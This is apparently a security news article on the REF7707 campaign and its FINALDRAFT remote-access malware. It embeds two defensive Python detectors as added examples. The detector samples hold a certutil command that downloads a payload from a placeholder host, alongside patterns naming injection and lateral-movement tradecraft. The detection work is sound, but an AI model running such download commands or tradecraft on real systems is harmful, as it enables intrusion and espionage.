
REF7707 Hackers Target Windows & Linux Systems with FINALDRAFT Malware

Elastic Security Labs has uncovered a sophisticated cyber-espionage campaign, tracked as REF7707, targeting entities across South America and Southeast Asia.

Central to this operation is the deployment of a novel malware family named FINALDRAFT, which has been engineered to exploit both Windows and Linux systems.

The campaign highlights the increasing use of legitimate cloud services, such as Microsoft’s Graph API, for covert command-and-control (C2) communications.

Advanced Malware Leveraging Cross-Platform Capabilities

The REF7707 campaign was first identified in November 2024 during an investigation into a breach at a South American foreign ministry.

The attackers utilized FINALDRAFT alongside custom loaders like PATHLOADER and GUIDLOADER to execute encrypted shellcode and maintain persistence.

FINALDRAFT is a full-featured remote administration tool (RAT), written in C++, capable of process injection, file manipulation, and network proxying.

Its modular design allows for additional functionalities to be deployed dynamically.

A key feature of FINALDRAFT is its abuse of the Microsoft Graph API to communicate through Outlook’s draft email folder.

Commands are issued via email drafts created by attackers, while responses are stored as new drafts, bypassing traditional email monitoring systems.

This stealthy approach minimizes detection by blending malicious traffic with legitimate organizational activity.
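The draft-based channel described above still leaves a mailbox-side trace: a client that creates and clears drafts in bursts and never sends anything. The heuristic below is an added illustration, not code from Elastic's report or the article; it runs over constructed events only loosely modelled on mailbox audit records, and the field names, client labels and the app-id placeholder are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example: heuristic for the draft-folder C2 channel the article describes, where commands
# and responses are exchanged as Outlook drafts through the Graph API and nothing is ever sent.
# Events are constructed and only loosely modelled on mailbox audit records; field names,
# client labels and timestamps are assumptions for this example.
INTERACTIVE_CLIENTS = {"Outlook Desktop", "Outlook Web"}

def detect_draft_c2(events: list[dict], window: timedelta = timedelta(minutes=30),
                    min_creates: int = 4) -> dict[tuple[str, str], dict]:
    """Return {(mailbox, client): detail} for non-interactive clients that created at least
    `min_creates` drafts inside one `window`, also deleted drafts, and never sent a message.
    A person drafts slowly and ends with a Send; a polling implant creates and clears drafts in bursts."""
    groups = defaultdict(lambda: {"Create": [], "Delete": [], "Send": 0})
    for e in events:
        if e["client"] in INTERACTIVE_CLIENTS:
            continue
        g = groups[(e["mailbox"], e["client"])]
        if e["op"] == "Send":
            g["Send"] += 1
        elif e["op"] in ("Create", "Delete"):
            g[e["op"]].append(datetime.fromisoformat(e["ts"]))
    hits = {}
    for key, g in groups.items():
        creates = sorted(g["Create"])
        burst = start = 0  # largest number of draft creations inside any sliding window
        for end in range(len(creates)):
            while creates[end] - creates[start] > window:
                start += 1
            burst = max(burst, end - start + 1)
        if burst >= min_creates and g["Delete"] and g["Send"] == 0:
            hits[key] = {"burst_creates": burst, "deletes": len(g["Delete"]),
                         "first_seen": creates[0].isoformat()}
    return hits

# Constructed sample trail: a user drafting normally, a sync client, and a mailbox used as a drop box.
def _ev(ts, mailbox, client, op):
    return {"ts": ts, "mailbox": mailbox, "client": client, "op": op}

SAMPLE_EVENTS = [
    _ev("2025-02-10T09:00:00", "alice@example.invalid", "Outlook Web", "Create"),
    _ev("2025-02-10T09:25:00", "alice@example.invalid", "Outlook Web", "Send"),
    _ev("2025-02-10T09:30:00", "bob@example.invalid", "Mobile Sync", "Create"),
    _ev("2025-02-10T09:31:00", "bob@example.invalid", "Mobile Sync", "Delete"),
] + [
    _ev(f"2025-02-10T10:{m:02d}:00", "carol@example.invalid", "app-id-PLACEHOLDER", op)
    for m, op in [(0, "Create"), (1, "Delete"), (2, "Create"), (3, "Delete"),
                  (4, "Create"), (5, "Delete"), (6, "Create"), (7, "Delete")]
]
```

The thresholds are starting points; in a real tenant they should be tuned against the baseline of automation that legitimately touches drafts (mobile sync, add-ins) so that only burst-and-clear behaviour without a Send stands out.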

The malware also boasts 37 command handlers and advanced evasion techniques, such as executing PowerShell commands without invoking “powershell.exe” and leveraging stolen NTLM hashes for lateral movement.

A Linux variant of FINALDRAFT has also been identified, featuring similar C2 capabilities and the ability to execute shell commands or self-delete from infected systems.

Operational Missteps Expose Infrastructure

Despite its technical sophistication, the REF7707 campaign exhibited operational security flaws that exposed additional adversary-owned infrastructure.

Attackers relied heavily on cloud services like Google Firebase and Pastebin for payload delivery and staging, further complicating detection efforts.

However, inconsistent evasion tactics revealed pre-production malware samples and other compromised systems.

The initial infection vector remains unclear, though attackers used Microsoft’s certutil application to download payloads from a compromised server.

They also employed Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) for lateral movement within networks using stolen credentials.

Persistence was achieved through scheduled tasks that invoked renamed system binaries to load malicious configurations.

The malware leveraged legitimate tools like the Windows debugger (CDB.exe) to inject shellcode into processes such as mspaint.exe, further obscuring its activity.

[Figure: Shellcode injection into mspaint.exe]
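The host-side tradecraft listed above (certutil downloads, WinrsHost.exe children, scheduled tasks running renamed system binaries, cdb.exe launching mspaint.exe) can be matched in process-creation telemetry. The detector below is an added example, not code from Elastic or the article; the event field names and the sample events are constructed assumptions, loosely shaped like Sysmon process-creation records.

```python
import re

# Added example: flag the REF7707 host tradecraft the article describes over constructed
# process-creation events (dicts loosely shaped like Sysmon Event ID 1; field names are assumptions).
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def analyze(event: dict) -> list[str]:
    """Return findings for one process-creation event (empty list if nothing matched)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    parent_cmd = event.get("ParentCommandLine", "").lower()
    original = event.get("OriginalFileName", "").lower()
    findings = []
    # certutil used as a downloader (the article: payloads fetched with certutil).
    if image == "certutil.exe" and URL_RE.search(event.get("CommandLine", "")):
        findings.append("certutil.exe invoked with a URL: possible payload download")
    # WinRM Remote Shell plugin spawning processes (lateral movement with stolen credentials).
    if parent == "winrshost.exe":
        findings.append(f"{image} spawned by WinrsHost.exe: WinRM remote shell activity")
    # Renamed system binary (PE OriginalFileName != on-disk name); note when Task Scheduler ran it.
    if original and original != image:
        via = " via scheduled task" if parent == "svchost.exe" and "schedule" in parent_cmd else ""
        findings.append(f"renamed binary {image} (OriginalFileName {original}){via}")
    # Windows debugger used as an injection vehicle (article: cdb.exe -> mspaint.exe).
    if parent == "cdb.exe":
        findings.append(f"{image} launched under cdb.exe: debugger-driven injection")
    return findings

def analyze_events(events: list[dict]) -> dict[int, list[str]]:
    """Map event Id -> findings for every event that produced at least one."""
    return {e["Id"]: f for e in events if (f := analyze(e))}

# Constructed sample telemetry for this example, not data from the campaign.
SAMPLE_EVENTS = [
    {"Id": 1, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://example.invalid/cfg.dat cfg.dat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Id": 2, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c whoami", "ParentImage": r"C:\Windows\System32\winrshost.exe"},
    {"Id": 3, "Image": r"C:\ProgramData\svc\update.exe", "OriginalFileName": "rundll32.exe",
     "CommandLine": "update.exe cfg.dat,Run", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule"},
    {"Id": 4, "Image": r"C:\Windows\System32\mspaint.exe", "OriginalFileName": "mspaint.exe",
     "CommandLine": "mspaint.exe", "ParentImage": r"C:\Program Files\Debuggers\cdb.exe"},
]
```

Each check is a behavioural signal rather than a hash or domain match, which is the point the article makes about this campaign: the binaries involved are all legitimate, so what stands out is who launched them and with what arguments.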

FINALDRAFT’s use of legitimate services like Microsoft’s Graph API poses significant challenges for defenders relying on network-based intrusion detection systems.

Once communication is established, all traffic is routed through trusted infrastructure, making it nearly indistinguishable from normal organizational activity.

Elastic Security Labs emphasizes the need for robust defensive strategies to counter advanced threats like REF7707.

Organizations are encouraged to monitor endpoint behaviors closely and implement multi-layered security measures to detect anomalies in legitimate service usage.

This campaign underscores the growing sophistication of espionage-oriented cyber threats and the need for continuous vigilance in securing critical systems against emerging attack vectors.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
